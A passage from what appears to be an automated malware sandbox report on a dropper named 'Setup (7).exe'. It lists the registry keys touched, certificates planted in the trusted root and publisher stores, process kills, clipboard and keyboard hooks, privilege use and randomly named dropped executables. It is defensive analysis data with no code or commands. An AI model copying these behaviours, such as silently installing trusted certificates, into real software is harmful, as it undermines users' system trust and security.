| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{70EAB05E-5E03-4185-9D30-4DF63400B003} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\NavBar = 000000000000000000000000000000008b000000870000003153505305d5cdd59c2e1b10939708002b2cf9ae6b0000005a000000007b00360044003800420042003300440033002d0039004400380037002d0034004100390031002d0041004200350036002d003400460033003000430046004600450046004500390046007d005f0057006900640074006800000013000000cc0000000000000000000000 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32 | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32\ = "{94512587-22D8-4197-B757-6BA2F3DE6DEC}" | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A} | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{FA258E0D-C23E-4891-8531-1B2DAAFC870E} | C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [certificate blob removed] | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = [certificate blob removed] | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = [certificate blob removed] | C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = [certificate blob removed] | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = [certificate blob removed] | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (7).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (7).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3185609.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\5422328.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\6304551.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-C4RDE.tmp\builder.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\Jo7OZ89bXUVMlrcM4raAPrDn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\AC1F.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (7).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (7).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv sjuMneG/lkSK2C7c/HduvQ.0.2
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
